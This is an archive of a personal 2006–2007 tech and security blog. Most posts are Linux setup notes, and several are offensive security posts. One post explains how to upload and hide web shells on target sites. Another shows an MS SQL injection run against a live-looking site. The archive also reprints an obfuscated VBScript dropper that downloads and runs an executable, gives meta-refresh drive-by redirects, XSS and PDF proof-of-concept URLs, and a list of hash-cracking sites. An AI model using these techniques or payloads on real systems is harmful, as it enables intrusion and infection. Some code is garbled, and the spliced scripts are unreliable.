Thursday, September 13, 2007

Annoying gmail advertisements & links

Gmail has been part of my life in the past few years, I recently found its sponsored links particular annoying. Sure most gmail users got the same thought, well some might think it is helpful...but I don't! I decided to remove, there is no default options in gmail allows you to disable it. Examining its generated html code, the entire ad is in the rh section within a big div, so you can force your browser to remove it with greasemonkey or stylish in firefox...
GMAIL code:


....


// Gmail ad Removal user script
// 2007-09-13
//
//
// ==UserScript==
// @name gmail ad removal
// @namespace http://insistkool.blogspot.com
// @description remove gmail ad
// @include http://mail.google.com/*
// ==/UserScript==
for (var i=0; i< document.getElementsByTagName("div").length; i++) {
if (document.getElementsByTagName("div").item(i).className == "rh"){
document.getElementsByTagName("div").item(i).style.visibility = "hidden";
document.getElementsByTagName("div").item(i).style.display = "none";
}
}

Or in a much cleaner way with css within stylish

@-moz-document domain(mail.google.com) {

.rh {display: none !important;}
}

Using greasemonkey user script is undoubtedly much slower, since it has to loop through all divs... maybe there is a better way to locate div tag class name, but I don't know...anyway, it does the job, who care..lol

Sunday, July 29, 2007

Turn on syntax highlight in vim

This really annoys me! Every time I used vim, I have to turn on syntax highlight and numbering etc manually. And I can't find .vimrc in my home directory, only .viminfo is there. Here is how to get it solved,

create a .vimrc in your $HOME directory,
vim ~/.vimrc
then put all the statements
syntax on
set number
set wrapmargin=1
set background =
...
Now syntax highlighter and numbering are on, yo....

Friday, July 20, 2007

"Automate Installation of Web Server in openSUSE 10.2 (installs Apache, MySQL, and PHP) - bash script"

A nice script written by Scott Morris, good for lazy/newbie. Full details at http://www.suseblog.com/?p=240

http://www.suseblog.com/install-lamp-stack.sh.tar.bz2 (tar -jxvf install-lamp-stack.sh.tar.bz2)

#!/bin/sh
# Bash script to install a lamp stack on an opensuse 10.2 system.

printf "##############################################################################
##\n"
printf "INSTALL SCRIPT FOR APACHE, MYSQL, AND PHP ON openSUSE 10.2\n"
printf "by Scott Morris (2007-06-21)\n"
printf "http://www.suseblog.com/\n\n"
printf "##############################################################################
##\n"

# Make sure we are root.
if [ "$EUID" != "0" ]; then
echo "You must have root privileges to run this script!"
exit 1
fi

printf "\n############################################################################
####\n"
printf "Installing Apache, MySQL, and PHP...\n"
printf "##############################################################################
##\n"

yast -i apache2-mod_php5 php5 php5-bz2 php5-gd php5-iconv php5-mbstring php5-mcrypt ph
p5-mysql php5-snmp php5-zlib mysql mysql-client mysql-devel mysql-shared perl-DBD-mysq
l apache2 apache2-mod_perl apache2-prefork libapr-util1 libapr1 php5-pdo

printf "\n############################################################################
####\n"
printf "Starting Apache and MySQL...\n"
blah@winnt:/tmp/attack_lab> vim install-lamp-stack.sh
blah@winnt:/tmp/attack_lab> cat install-lamp-stack.sh
#!/bin/sh
# Bash script to install a lamp stack on an opensuse 10.2 system.

printf "################################################################################\n"
printf "INSTALL SCRIPT FOR APACHE, MYSQL, AND PHP ON openSUSE 10.2\n"
printf "by Scott Morris (2007-06-21)\n"
printf "http://www.suseblog.com/\n\n"
printf "################################################################################\n"

# Make sure we are root.
if [ "$EUID" != "0" ]; then
echo "You must have root privileges to run this script!"
exit 1
fi

printf "\n################################################################################\n"
printf "Installing Apache, MySQL, and PHP...\n"
printf "################################################################################\n"

yast -i apache2-mod_php5 php5 php5-bz2 php5-gd php5-iconv php5-mbstring php5-mcrypt php5-mysql php5-snmp php5-zlib mysql mysql-client mysql-devel mysql-shared perl-DBD-mysql apache2 apache2-mod_perl apache2-prefork libapr-util1 libapr1 php5-pdo

printf "\n################################################################################\n"
printf "Starting Apache and MySQL...\n"
printf "################################################################################\n"

/etc/init.d/apache2 start
/etc/init.d/mysql start

printf "\n################################################################################\n"
printf "Adding Apache and MySQL to boot sequence...\n"
printf "################################################################################\n"

chkconfig -a apache2
chkconfig -a mysql

printf "\n################################################################################\n"
printf "Status of Apache and MySQL...\n"
printf "################################################################################\n"

/etc/init.d/apache2 status
/etc/init.d/mysql status

printf "\n################################################################################\n"
printf "You must now run the following command to initialize your MySQL root password:\n"
printf "/usr/bin/mysqladmin -u root password 'new-password'\n"
printf "/usr/bin/mysqladmin -u root -h `hostname`.`dnsdomainname` password 'new-password'\n"
printf "Note that unless you've set it up to be different, your web root is here:\n"
printf "/srv/www/htdocs\n"
printf "################################################################################\n"

Tuesday, July 03, 2007

Football manager 2007 on opensuse

I started to love FM2007, but it took me two days to figure out how to play on top of my opensuse 10.2. If you are into the same trouble, hopefully this helps you:

First of all, FM2007 doesn't provide Linux version, so I just grab a Windows binary (assume it is fm.iso).
To emulate Windows binary, wine does the job very well, I use rug to install wine.

rpm --import http://software.opensuse.org/openSUSE-Build-Service.asc
rug sa http://software.opensuse.org/download/Emulators:/Wine/SLE-10/ "Wine Repository"
rug sub "Wine Repository"
rug install wine

Now you have wine installed successfully, it is time to mount the iso
mkdir /mnt/fm
mount -o loop -t iso9660 fm.iso /mnt/fm
cd /mnt/fm
You also need jre to run the game,
wine jre-1_5_0_09-windows-i586-p-s.exe
Then,
wine Setup\ FM2007\PC.exe -console
When you finish all these steps, you need to replace the original exe file with the No-CD version. For most of the gamers, execute
wine fm.exe
will start the game, but my special monitor supports up to 800x600 @60, so if you have a similar monitor, you have to the Desktop size to 1024x768 and check all the "Windows settings" in the "Graphic tab". Now you all set, happy gaming.

Web shell? - why, how and where

Some folks asked me what else to do when you have a shell, well, it certainly depends on your shell privilege and specific target setup and configuration, there is no perfect universal way, only the best possible way.

Ok, there are simply too many stuff you can do, and I just list one I used a lot. My personal preference is to put a web shell on the target, so what is web shell? Some people called it web backdoor, it mainly provides
a set of functions to manipulate the target. Why do I prefer web shell rather than trojan or other backdoorings? Several reasons back me up, 1st) most of your target are web-based, (how many companies today don't have a website?) 2nd) most of these sites are on shared host, chances are these low cost host usually don't give out a shell, they do the whole thing pretty much via some hot GUI application, such as ispconfig, phpmyadmin, some built-in forums and blogging applications like phpbb etc. 3rd) it is relatively hard to be detected, traditional virus, worm, trojan will be caught very easily when the anti signature is up-to-dated. Well, you might argue web ids/ips have been developed and anti vendors started to include these web shell into the signatures, that is absolutely correct. But the point is they are not yet mature and very few companies are using them.

Then how do you upload a web shell? Again, it relies on the specific target, for blog, forum, CMS like applications, it is very likely that you can by the following techniques

  • change file extension - this probably won't work for the majority applications
  • obfuscation/encryption/encoding - simply to escape the application security check, be aware the after shell can still be interpreted.
  • injection - using "echo" to echo the content of your shell or some build-in sql functions to generate a new file, make sure to trim shell size, web server usually has length restriction (most likely 256)
There are a lot of other ways such as inject script into an acceptable file (such as gif, jpeg etc), I am not gonna list them here, (unless I am writing my book, hehe). Here are two good list of popular web shell, trade-off of popularity certainly means higher chance of being detected and killed.

http://michaeldaw.org/projects/web-backdoor-compilation/
http://www.unsec.net/2007/03/web_backdoor_jspshell_aspshell_1.html

Make sure you pick the right one or your effort will be dismissed. If you are not sure how to find out the target web server name and version, come back in a few days to check out my basic web server fingerprint tutorial, I will be showing you how to target these info.

Monday, July 02, 2007

MS SQL injection review

Long time ago, I post a little review about mysql injection, now it is time to do a self review/remind about ms sql injection...lol, old school technique...It is, I was a little surprise that my brother found a website susceptible to MS SQL injection, I almost forget how to do this manually. This target is build with traditional asp, with a classic vulnerable script named product.asp.

Of course we need to detect the existence with sql injection, stick a ' returns a '80040e14' error. There you go, then enumerate table name, product.asp?ProductID=" having 1=1--

returns column name p.Product_Name, then execute product,asp?ProductID=" Group by p.Product_Name having 1=1--, table enumeration can be finished pretty quick, of course a little script can automate the whole process. Just do a regex to match the column name. Right here, we can testify with union all

http://www.site.com/productdet.asp?ProductID=1%20UNION%20ALL%20SELECT%201,1,2,3,4,5,6,7,8,9%20FROM%20sysobjects

It works fine. Surprisingly, this website also has cmd_shell opened, till this point, the whole game becomes not worthwhile to continue. Plus, the site also enable rdp and remote registry, so there are tons ways to get in. I guess I should just stop here....

Javascript alert in PHP

How do you put javascript in PHP code? A friend of mine who is taking a web course asked me, well, this is indeed a basic question. But his instructor "forces" him to use alert method to output the session value, so it took quite a while to figure out how to do this.

Basically his assignment is echo number of visitors by using session and alert the value. Here is how?

session_start();
$_SESSION['visitors'] = $_SESSION['visitors'] + 1;

if(isset($_SESSION['visitors']){
echo "";
?>
Feels too basic? Yup,it is... But it does annoys beginners for a few days,esp when his/her head prefer this evil javascript...

Wednesday, May 09, 2007

Online reverse lookup sites

Ripped from kuza55 blog, I thought this may come in handy.


" http://kuza55.blogspot.com/2006/10/online-reverse-lookup-tables-for.html

md5:
http://www.tmto.org/ (formerly md5lookup.com)
http://md5.rednoize.com (good with words)
http://nz.md5.crysm.net (English dictionary, nearly all one to four character alphanumeric. 27.8m records.) - seems to be down atm
http://us.md5.crysm.net (British, Jargon and American worldlist, IP addresses 16.0m records)
http://www.xmd5.org (good with numbers)
http://gdataonline.com (wordlist based, I think)
http://www.hashchecker.com (It seems to say its good, but I've never gotten many hits form here)
http://passcracking.ru
http://www.milw0rm.com/md5
http://plain-text.info (this one is quite good and generally returns results, but you have to submit things to be cracked, its not just an online database)
http://www.securitystats.com/tools/hashcrack.php (does various, including LM NTLM and SHA-1, but seems to return no results on anything than the most basic, so rather useless)
http://www.schwett.com/md5/ - Does Norwegian words too
http://passcrack.spb.ru/
http://shm.pl/md5/
http://www.und0it.com/
http://www.neeao.com/md5/
http://md5.benramsey.com/
http://www.md5decrypt.com/
http://md5.khrone.pl/
http://www.csthis.com/md5/index.php
http://www.md5decrypter.com/
http://www.md5encryption.com/
http://www.md5database.net/
http://md5.xpzone.de/
http://md5.geeks.li/
http://www.hashreverse.com/
http://www.cmd5.com/english.aspx
http://www.md5.altervista.org/
http://md5.overclock.ch/biz/index.php?p=md5crack&l=en
http://alimamed.pp.ru/md5/ (for those who can't read russian: put your md5 in the second box)
http://md5crack.it-helpnet.de/index.php?op=add (German, I have no idea....)
http://cijfer.hua.fi/ (Projects->md5 reverse lookup)
http://shm.hard-core.pl/md5/
http://www.mmkey.com/md5/HOME.ASP
http://www.thepanicroom.org/index.php?view=cracker
http://rainbowtables.net/services/results.php (I'm not sure i'd trust this site to give more than a tiny amount of results)
http://rainbowcrack.com/ (requires people to contribute rainbowtables to be able to query them, and continue contributing them constantly)
http://www.securitydb.org/cracker/
http://passwordsecuritycenter.com/index.php?main_page=product_info&cPath=3&products_id=7 (This is meant to be used as proof that they can actually reverse passwords to convince you to buy their stuff, but as long as they decrypt it it doesn't matter why, right?)
http://0ptix.co.nr/md5
https://www.astalavista.net/?cmd=rainbowtables
http://ice.breaker.free.fr/
http://www.md5this.com
http://www.pldsecurity.de/forum/md5.php
http://www.xeons.net/genesis/
http://hackerscity.free.fr/
http://bisix.cogia.net/
http://md5.allfact.info/
http://bokehman.com/cracker/
http://www.tydal.nu/article/md5-crack/
http://ivdb.org/search/md5/
http://md5.netsons.org/
http://md5.c.la/ (The form at the bottom left of the page)
http://www.jock-security.com/md5_database/?page=crack
http://c4p-sl0ck.dyndns.org/cracker.php
http://www.blackfiresecurity.com/tools/md5lib.php (Queries the MD5 Library AIM Bot)
http://www.md5-db.com/index.php

lm Only:
http://lasecwww.epfl.ch/~oechslin/projects/ophcrack/ (Currently Offline)
http://www.milw0rm.com/lm (Currently Offline)

lm + ntlm:
http://plain-text.info
http://www.securitystats.com/tools/hashcrack.php
http://rainbowtables.net/services/results.php
http://rainbowcrack.com/
http://passwordsecuritycenter.com/index.php?main_page=product_info&cPath=3&products_id=7
https://www.astalavista.net/?cmd=rainbowtables

md4:
http://www.securitystats.com/tools/hashcrack.php
http://rainbowtables.net/services/results.php
http://rainbowcrack.com/

sha1:
http://passcrack.spb.ru/
http://www.hashreverse.com/
http://rainbowcrack.com/
http://www.md5encryption.com/
http://www.shalookup.com/
http://md5.rednoize.com/
http://c4p-sl0ck.dyndns.org/cracker.php
http://www.tmto.org/

"

Saturday, May 05, 2007

Malware sites

I was pocking around the net, found some interesting malware sites:

Please don't try any of them unless you know what you are doing

http://jokeonlineworld.com/gift.html
< meta equiv="Refresh" content="0; URL=http://jokeonlineworld.com/gift.exe">


http://jokeonlineworld.com/
< meta equiv="Refresh" content="0; URL=http://jokeonlineworld.com/install.exe">


http://sequestro.t35.com/
"http://www.blogger.com/exigencias.exe" Leia atentamente todas as exigencias.

And another type which uses vbscript
http://www.youshini.com/jp/789.htm
on error resume next
Dim haotian
Set y = Nothing
ppp="obj"
ppp1="ect"
ppp2=ppp&ppp1
Set data = document.createElement(ppp2,"")
data.setAttribute ("classid"), ("clsid:BD96C556-65A3-11D0-983A-00C04FC29E36")
bbs ="Micro"
bbs0 ="delm"
bbs1 ="soft.XMLHTTP"
bbs2 =bbs&bbs1
result = Null And Null
Set x = data.CreateObject(bbs2,"")
set mm = data.createobject("Adodb.Stream","")
mm.type = 1
mm.open
url = "http://www.453787.com/jp/photo1.exe"
ysha="GET"
x.Open ysha, url, False
x.Send
exe="haotian.bat"
bbp1 ="Scrip"
bbp2 ="ting.FileSystem"
bbp3 ="Object"
bbp =bbp1&bbp2&bbp3
mm.write x.responseBody
set F = data.createobject(bbp,"")
Set T = Nothing
set tmp = F.GetSpecialFolder(2)
exe= F.BuildPath(tmp,exe)
mm.savetofile exe,2
mm.close
set Bb = data.createobject("Shell.Application","")
Bb.ShellExecute exe,"","","open",0


Little more Googling led me to this
http://malware.hiperlinks.com.br/cgi/submit-agressive?action=list&type=agressive
which holds tons malware site, most of them are using the above two techniques, via embedding inside a script, flash or simply post the link.

Certainly most of these malwares are coded in different ways and have various features, such as keylogging, reverse connect, spwan a port, send credential over email or to irc etc. I don't feel surprise they use script to force victim to download their babies, but using < meta equiv="Refresh" content="0; URL=http://url"> is indeed pretty cool, coz it will be executed even you disable javascript in browser. I guess if it is possible to change exe to some other common mime type that a browser will download automatically, such as gif, swf etc will make the whole game more serious and horrible.

However, it is so funny to see how they work, and it is easy to steal what the attackers had collected due to most cracked stuff are stored in plain text.

Thursday, May 03, 2007

"Interview ith Rain Forest Puppy" - From www.ush.it

If you don't know who RFP is, you are still a dumb boy.
"Interview with Rain Forest Puppy"
http://www.ush.it/2007/05/01/interview-with-rain-forest-puppy/

Saturday, April 21, 2007

How to build a great markup

So you are a web master, a web designer, or a novice who start web design? if you've ever stumbled across your web site full of gibberish that was actually meant to be Japanese, Greek, Swahili etc. You've probably forgotten to set the encoding. Search engine such Google, ask will sort results differently based on the language of a search request, proper encoding pays off if you want search engine traffic.

Below tutorials explains what happened behind and provide very good solution, definitely great tutorials!

Developing With Web Standards
http://www.456bereastreet.com/lab/developing_with_web_standards/

Fix Your Site With the Right DOCTYPE!
http://www.alistapart.com/articles/doctype

Sunday, February 18, 2007

XSS on abc

Oops, found xss on abc search Engine
http://app.abc.go.com/keyword/searchResults?search=%3Cscript%3Ealert%28%22xss%22%29%3C%2Fscript%3E&searchType=0

XSS is elsewhere!

Thursday, February 01, 2007

OWASP LiveCD

The OWASP Live CD is out! It is based on Morphix, runs completely in Memory. It ships with the following tools and docs:
Tools: WebGoat v4 WebScarab Paros JBroFuZZ Cal9000 Nmap TcpDump WireShark

Docs: OWASP Guide 2.0 OWASP Testing Guide,

The CD is 802mb, and still in beta version, which does not include any specialty tools such as VOIP, RFID, and Wireless. Thus, the pentest directory is almost empty. My first feeling is: lame and nonprofessional. Well, maybe that is why it is still in beta, I hope. If you compare to other hot pentesting live CDs, such as backtrack, I really can't see its point of releasing this CD, except they include all the OWASP guides. In addition, file permissions are not set properly, lots of useless stuff are included. I really don't see the point they released this CD, I love their guides and few applications, but I highly recommended you not to waste time on this crap, grab your desire documentation and application would definitely a better choice. Anyway, it is beta, I hope next I could see a decent release next time.

Wednesday, January 03, 2007

Google blacklist database

I got pointed to a couple interesting posts in the mailing list, about google blacklist database,

http://sb.google.com/safebrowsing/update?version=goog-black-url:1:1
http://sb.google.com/safebrowsing/update?version=goog-black-url:1:7998
http://sb.google.com/safebrowsing/update?version=goog-white-domain:1:19,goog-white-url:1:371,goog-black-url:1:7693,goog-black-enchash:1:15282
http://sb.google.com/safebrowsing/update?version=goog-black-url:1:7753
http://sb.google.com/safebrowsing/update?versio=goog-black-url:1:0000

Obviously google uses these data for "safebrowsing", and it is interesting that Google even log credential and some other sensitive info. I picked some blacklisted url randomly, and they are really phishy. It is good for security folk to figure out how phisher set up fake sites, also great for vendor to compile these lists to enhance its product's anti-phishing.

Oops...PDF, keep an eye on it!

From pdp
"You must understand that the attacker doesn’t need to have write access to the specified PDF document. In order to get an XSS vector working you need to have a PDF file hosted on the target and that’s all about it. The rest is just a matter of your abilities and desires.

This finding was originally mentioned by Sven Vetsch, on his blog. The attack vector was discovered by Stefano Di Paola and Giorgio Fedon. This is a very good and quite interesting finding. Good work."

A Poc:
http://some.random.site.com/foo.pdf#something=javascript:alert(123);

Couple variants:
1. Universal CSRF / session riding;
(Mozilla Firefox, Internet Explorer, Opera + Acrobat Reader plugin)

2. UXSS in #FDF, #XML e #XFDF;
(Mozilla Firefox + Acrobat Reader plugin)

3. Possible Remote Code Execution;
(Mozilla Firefox + Acrobat Reader plugin)

4. Denial of Service;
(Internet Explorer + Acrobat Reader plugin)

Details @ http://www.wisec.it/vulns.php?page=9

Very interesting and dangerous bug, don't simply click pdf from now on. If you really need to download pdf, keep an eye on the url, strip extra parameters if there is any. Dangerous, Dangerous, Dangerous! Web is getting really crazy, sigh

Thursday, December 28, 2006

Not much

Become interested in sniffering recently, having so much fun with hacking my machines around, I am pretty impressed about what ettercap capability, it gives pretty good result when combining with other tools. I will write up a detail tutorial over this topic.

Also I learned some new OS fingerprinting techniques when I reviewed nmap,xprobe and ettercap fingerprinting code. I should come up some new discoveries as time goes on...hopefully!

Wednesday, December 27, 2006

Get your dsniff working on Slackware

Surely everyone has heard dsniff, an evil set of 31337 network tools. I finally grab a copy and wanna give it a try, but traditional ./confugre &&amp;amp;amp;amp;amp;amp; make && make install didn't get it work. Couple hours googling took me a patch made by Sined , someone claimed it works while it didn't work on my slack box.. well, maybe it is for other distr or I have something missing (I guess I don't) , I got no clue what changes he made, neither able to google a solution works for me. So I figured out this simple dirty way, hope this helps for folks who facing the same problems.

www.packetfactory.net is down at the moment, I grabed a copy from http://www.enzotech.net/dsniff.html (Don't use ones on sf -outdated)
libnids-1.16-fixed-FC.tar.gz
libnet-1.0.2a-fixed-FC.tar.gz

After installing libnet and libnid,

insistkool@foo:~/dsniff$ ./configure
insistkool@foo:~/dsniff$ make
This produces bunch of compilation errors

----------------------------------------------------------------------------
./sshcrypto.c:25: error: field `key' has incomplete type
./sshcrypto.c:30: error: syntax error before "des_key_schedule"
./sshcrypto.c:30: warning: no semicolon at end of struct or union
./sshcrypto.c:31: warning: data definition has no type or storage class
./sshcrypto.c:32: error: syntax error before '}' token
./sshcrypto.c: In function `blowfish_encrypt':
./sshcrypto.c:131: error: `BF_ENCRYPT' undeclared (first use in this function)
./sshcrypto.c:131: error: (Each undeclared identifier is reported only once
./sshcrypto.c:131: error: for each function it appears in.)
./sshcrypto.c: In function `blowfish_decrypt':
./sshcrypto.c:143: error: `BF_DECRYPT' undeclared (first use in this function)
./sshcrypto.c: In function `des3_init':
./sshcrypto.c:153: error: dereferencing pointer to incomplete type
./sshcrypto.c:156: error: dereferencing pointer to incomplete type
./sshcrypto.c:157: error: dereferencing pointer to incomplete type
./sshcrypto.c:160: error: dereferencing pointer to incomplete type
./sshcrypto.c:162: error: dereferencing pointer to incomplete type
./sshcrypto.c:164: error: dereferencing pointer to incomplete type
./sshcrypto.c:165: error: dereferencing pointer to incomplete type
./sshcrypto.c:166: error: dereferencing pointer to incomplete type
./sshcrypto.c: In function `des3_encrypt':
./sshcrypto.c:176: error: dereferencing pointer to incomplete type
./sshcrypto.c:176: error: dereferencing pointer to incomplete type
./sshcrypto.c:178: error: dereferencing pointer to incomplete type
./sshcrypto.c:178: error: dereferencing pointer to incomplete type
./sshcrypto.c:178: error: `DES_ENCRYPT' undeclared (first use in this function)
./sshcrypto.c:179: error: dereferencing pointer to incomplete type
./sshcrypto.c:179: error: dereferencing pointer to incomplete type
./sshcrypto.c:179: error: `DES_DECRYPT' undeclared (first use in this function)
./sshcrypto.c:180: error: dereferencing pointer to incomplete type
./sshcrypto.c:180: error: dereferencing pointer to incomplete type
./sshcrypto.c: In function `des3_decrypt':
./sshcrypto.c:189: error: dereferencing pointer to incomplete type
./sshcrypto.c:189: error: dereferencing pointer to incomplete type
./sshcrypto.c:191: error: dereferencing pointer to incomplete type
./sshcrypto.c:191: error: dereferencing pointer to incomplete type
./sshcrypto.c:191: error: `DES_DECRYPT' undeclared (first use in this function)
./sshcrypto.c:192: error: dereferencing pointer to incomplete type
./sshcrypto.c:192: error: dereferencing pointer to incomplete type
./sshcrypto.c:192: error: `DES_ENCRYPT' undeclared (first use in this function)
./sshcrypto.c:193: error: dereferencing pointer to incomplete type
./sshcrypto.c:193: error: dereferencing pointer to incomplete type
make: *** [sshcrypto.o] Error 1

----------------------------------------------------------------------------

You can see err mainly caused by the failure to locate several function calls (des_key_schedule,DES_ENCRYPT, DES_DECRYPT etc). Be aware dsniff heavily relies on libnet, libnid and openssl (and few more)

insistkool@foo:~/dsniff$ cp sshcrypto.c sshcrypto.c.orig
insistkool@foo:~/dsniff$ vi sshcrypto.c
remove the space when you edit your file
15 #include <>
16 #include <>
17
18 #include <>
19 #include <>
20 #include
21
22 #include "sshcrypto.h"

So, we can tell compiler where these headers locate

15 #include <>
16 #include <>
17 #include <>
18 #include <>
19 #include <>
20 #include <>


All rite, now simply:
insistkool@foo:~/dsniff-2.3$ make
insistkool@foo:~/dsniff-2.3$ su -c 'make install'

Well, even I am on slackware, I think it will works just fine on other distributions. Lesson of the day - Don't google before read through give away message and get my hand dirty!

Saturday, December 16, 2006

How to install Slackware 11.0 in VMWare 5.5 on Windows XP?

Slackware 11 is out! All slackware user must be great to see this long waited version (Yes, I am a slacker ^^)

To feel the new slackware, I decided to install it in VMware on latop.

My Software:
Compaq Laptop Presario v4400
VMWare WorkStation 5.5 build-29772
Slackware 11.0

For those whom curious its new features and change, please review official change log at http://www.slackware.com/announce/changes11.0.php


First we grap a copy of Slackware ISO (FTP, HTTP, BitTorrent).
New slackware contains 6 CDs.
CD 1 base packages
CD 2 KDE
CD 3 KDEI (you need this if you are not English speaker)
CD 4-6 Source Code

Choose the appropriate CD according to your need. I downloaded the first 2 CDs with BitTorrent since I don't need GUI language pack and source code. If you are new to slackware, please go through the tutorials provided below.

p.s: Always verify md5sum, some ISO
A windows based md5sum can be reached http://www.md5summer.org/download.html

Fire up VMWare, create a new "Virtual Machine" -> Typical -> Linux -> Other Linux 2.4.x kernel (Slackware 11 uses 2.4.33.3) -> Save to wherever you like-> NAT (or bridge if you like, I chooce NAT at this case)

One trick here is VMWare uses SCSI by default, this needs couple more steps during installation. Thus, I change it to IDE by removing and adding in the "Edit virtual machine settings" section. Now, you need to tell VMWare to use "Physical drive" and certainly insert the CD 1. Till here, you are done for VMWare setup, time to installation.

First of all, change Boot sequence to boot from CD-ROM, all the way "Enter" and type in "root".
Now, you need to partition your hard drive, we use cfdisk /dev/hda (or fdisk) because it is simpler than fdisk.


You need to design your partition, here is my partition table (8 G):

512 Mb root partition (primary partition)
The root filesystem, contains system software and libraries, configuration data (/etc), local state data (/var) and all other filesystems are mounted under it.

Extended partition utilizing the rest of the disk
We then create logical drives on the extended partition.

512 Mb swap partition (logical drive)
Note that you probably don't need a swap partition that large but I like the extra insurance and I have plenty of space. It allows me to work on absolutely huge files, and provides extra memory addressing in the event of some sort of race condition. 256 Mb should probably be enough swap though, if disk space is tight.

4 Gb partition for /usr (logical drive)
Most all of your software and libraries get installed in /usr. It is useful to have a large partition for this.

1.5 Gb partition for /opt (logical drive)
"Optional" software can be installed here. For example, KDE will be installed to /opt/kde. I install some other software to /opt as well.

2 Gb (roughly) for /home (logical drive)
We use what is leftover, for /home. This is where the user directories are, and where users will store personal files. You may also install some software to /home if desired. I do, and I keep build directories there as well.

You might be interested in the following articles from Slackware FAQ:
How should I partition my hard disk?
How much swap space should I use?

Just follow the instructions, make your partitions.

You will be prompted after "write" partitions, "setup" your machine now.
root@slackware:/#setup

Scroll down to "ADDSWAP", you should see something like the below image after "SWAP SPACE DETECTED".

Choose/dev/hda1 as /root (follow table above), format the file system as "reiserfs". For the rest of partitions, perform the same procedure and eventually we see

You should be prompted to "select Slackware Installation source", CD is our choice. Then you need to pick your desired packages


After choose your desire packages, we simply perform a full installation. (You can always remove unwanted packages later)

you will be asked to "Install Linux Kernel". Again, we choose CD.


Be aware that all the options you made here can be modified later, so don't worry if you make any mistake.
Now we on the stage of "Enable Hotplug/VDEV" (This typically loads /etc/rc.d/rc.hotplug), we choose "No" and choose "simple" for LILO. The rest are pretty straightforward, I am sure any can figure out on his/her own. In the rest installation stages, you will be asked to configure video resolution, LILO destination (MBR typically), mouse configuration, GPM, Network configuration,

startup services, default window Manager for X (Note: GNOME is not available any more due to "hard to maintain", but you can download DropLineGNOME from http://droplinegnome.org/ if you insist on GNOME) and root password set up.

Till now, you are all set. Simply "reboot", then you will see the lovely login prompt.

Now, it is highly recommended to add a new less privileged user (adduser / useradd) .
Also run `alsaconf` to enable sound detection, `startx` to start GUI.

And I think I should mention slackware package management tool for those whom not are familiar with Slackware.

(You need "root" to run the following commands)
pkgtool - Menu-based package tool
installpkg - install a new package
removepkg - remove a package
upgradepkg - upgrade a pakcage
syntax: upgradepkg oldpkg%newpkg

For other package command (explodepkg etc, please review slackware handbook )
Installed package information store at /var/log/packages

Tons packages can be found at http://www.linuxpackages.net/
Official slackware package: http://packages.slackware.it/

"few" great slackware tutorial and tips can be found here (Yes, I said "few")
Excellent "free" slackware Book
http://www.slackbook.org/#book

Nice brief overview of slackware 11
http://linuxhelp.blogspot.com/2006/10/brief-look-at-slackware-110.html

Lots of useful links, articles and tips
http://www.userlocal.com/tips/tips.php

Slackware tips & tricks by Jack S.La
http://members.cox.net/laitcg/new/

Slackware Bible
http://www.slackersbible.org/?q=node/115


Final word:
Slackware is undoubtedly a great distribution (stable, simple, most Unix like, fast, secure...etc), my main intention to write this tutorial is to guide novice step into the world of Slackware. Drop me a note if you have any comment!

Thursday, December 14, 2006

Finish your work more efficiently

With linux's built in tool, we can do our work more efficiently. For instance, we want to create 50 user directories, tons way can do the task.

a perl version:
#!/usr/bin/perl

foreach i (1..50)
{
mkdir("user$_",0744);
# or use the system() function
System(`mkdir user$_");
}

while we can do this with shell, but it only fits :
for i in {1,2,3,4,5,6,7}; do mkdir user$i;done

Perl liner seems to be the best solution for this kind of task (only one line and we can set permission, isn't it great!)

perl -e 'for(1..6) {mkdir("user$_",0744)}'

Of course perl is not only option, python, ruby, C or whatever you like can do a good job. A lot of folks would rather spend whole of time on begging around for 'automated' software, hack up your brain, hack your system, answer is always there for you.

Set up mysql 5.0.24 in slackware 11

It is a bit awkward to set mysql up in slackware, unlike redhat or other distributions does the whole work for you, slackware needs couple more steps. Here is how I set it up

$su -
$mysql_install_db
$chown -R mysql:mysql /var/lib/mysql
$chmod +x /etc/rc.d/rc.mysqld
$/etc/rc.d/rc.mysqld start

Then on another terminal, login with user belong to user group or root

$mysql
mysql>

How to install postgres 8.2 on slackware 11

Took me sometime to figure out postgres 8.2 installation on slackware 11
Here is how:
Grep a source copy of postgres from http://www.postgresql.org,

./configure
gmake
su
gmake install
adduser postgres
chown postgres /usr/local/pgsql/data
chown postgres /usr/local/pgsql/data
su - postgres
/usr/local/pgsql/bin/initdb -D /usr/local/pgsql/data
/usr/local/pgsql/bin/postgres -D /usr/local/pgsql/data >logfile 2>&1 &
/usr/local/pgsql/bin/createdb test
/usr/local/pgsql/bin/psql test


riped form http://www.postgresql.org/docs/8.2/interactive/install-short.html

An easy way is to download postgres package from http://www.linuxpackages.net,
installpkg postgres_xx.tgz

Sometimes you get error message like "fatal: role 'insistkool' does not exist", do:
$su
$createuser -U postgres
Enter name of role to add: insistkool
Shall the new role be a superuser? (y/n) y

$initdb -D ~/data
$postmaster -D ~/data
psql insistkool

Metasploit 3 needs postgres database to perform auto exploitation, so it is highly recommended to install postgres on your machine for testing

Friday, November 24, 2006

xss in magpierss

Found an xss bug in magpierss

Code in magpie_debug.php & others

if ( isset($_GET['url']) ) {
$url = $_GET['url'];
}
else {
$url = 'http://magpierss.sf.net/test.rss';
}

http://site/magpie_debug.php?url=code

A fix can be:

if(!preg_match("/^(http:\/\/)?([^\/]+)/i"), $url) {
$ext = strtolower( substr( strrchr( $filename, "." ) , 1 ) );
$url = Gud($url);
switch($ext)
{
case 'rss': do_something; break
case 'other_types': another_thing; break;
default: header("Location: http://magpierss.sf.net/test.rss");
}
}

function Gud( $url) {
$url = htmlentities($_GET['url'], ENT_QUOTES, 'utf-8' );
return $url;
}

Friday, November 17, 2006

Difference between main()/void main()/int main()/int main(void)/int main(int argc, char *argv[])

I thought this is helpful to novice

From: cprogramming.com

A very common question is "What's the difference between void main and int main?". This particular FAQ tries to answer that and more, covering other versions of the main() implementation.

The first thing to note is that this is one of those topics that people seem to like to argue over for hours, days and more. Some arguments are valid, some are not, and some are just plain old opinion.

The C and C++ standards differ when it comes to main(), so I'll detail each one separately.

For C

Under C89, main() is acceptable, although it is advisable to use the C99 standard, under which only these are acceptable:

int main ( void )
int main ( int argc, char *argv[] )

Slight variations of the above are acceptable, where int can be replaced by a typedef name defined as int, or the type of argv can be written as char ** argv, and so on.

The first option is used when you do not require access to the command line arguments.

The names argc and argv are identifiers that can be changed if you so desire, but sticking to argc/argv is convention.

The return type of main() must always be an int, this allows a return code to be passed to the invoker.

Under C89, the return statement at the end of main() is required, whereas under C99 if no return statement is present, return 0 is implied. However, it is good programming practice to always use a return statement, even if you don't have to.

For C++

The following are acceptable uses:

int main ( int argc, char *argv[] )
int main ()

The first option follows similar conventions to those used by C99.

